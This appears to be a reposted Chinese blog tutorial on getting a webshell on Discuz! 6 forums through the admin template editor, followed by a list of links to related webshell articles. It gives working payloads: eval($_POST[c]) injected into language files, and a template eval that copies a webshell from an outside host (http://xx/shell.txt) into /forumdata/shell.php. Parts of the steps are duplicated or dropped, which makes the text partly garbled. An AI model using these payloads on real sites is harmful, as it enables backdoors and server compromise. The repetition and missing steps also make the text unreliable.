Discuz! 6 后台拿webshell的方法
来源:互联网 发布:red hat linux文件夹 编辑:程序博客网 时间:2024/04/30 06:25
如果后台可以在线编辑模板的话,下面的方法就可以拿webshell了:
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
Quote:
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Quote:
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
Quote:
1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
Quote:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Quote:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
Quote:
eval("/$language['post_reply_quote'] = /"$language[post_reply_quote]/";");
呵呵,一个天然的后门:
PS:还有几个编辑模板的地方可以利用,和第二种方法类似。
只要是dz的模板编辑原理, 只要能编辑模板, 无论是以前, 现在, 还是以后的dz版本, 全部可以搞定, 方便快捷!
1. 随便选择一个模板
2. 找一个空间上传一个wehsehll, 假定其地址为http://xx/shell.txt
3. 在任意一个位置输入:
5. 访问该模板所属的php
6. 把模板改回原来的样子
大功告成, 可以访问/forumdata/shell.php了
1. 随便选择一个模板
2. 找一个空间上传一个wehsehll, 假定其地址为http://xx/shell.txt
3. 在任意一个位置输入:
CODE:
{eval copy('http://xx/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新Cache5. 访问该模板所属的php
6. 把模板改回原来的样子
大功告成, 可以访问/forumdata/shell.php了
- Discuz! 6 后台拿webshell的方法
- Discuz! 后台拿webshell万能方法
- discuz 2.5 后台拿 WebShell 方法
- Discuz! 6 后台拿Shell的方法
- 后台拿webshell的常用方法总结
- WORDPRESS后台拿WEBSHELL的2个方法
- DZ!2.5 后台拿 WebShell 方法!
- joomla CMS后台另类拿WebShell方法
- phpMyAdmin 后台拿webshell
- SDcms后台拿webshell
- phpMyAdmin 后台拿webshell
- 拿webshell权限的45种方法
- disucz 6.1后台拿webshell
- Discuz!后台怎么拿到Webshell
- 拿WebShell的经验
- 45种方法拿webshell
- 利用后台SQL查询语句拿webshell
- aspx+mssql后台登陆注入拿webshell
- Twitter架构学习
- Google架构学习
- Load Balancing
- Web站点数据库分布存储浅谈
- 网站架构
- Discuz! 6 后台拿webshell的方法
- 富人和穷人的区别
- 新年回到csdn
- 从LiveJournal后台发展看 大型网站系统架构以及性能优化方法
- Process Lasso v2.57 Beta 1
- 高并发高流量网站架构
- 有关JavaScript文章
- 程序员成长日记-(1) 为什么会这样设计呢?
- Web架构设计经验分享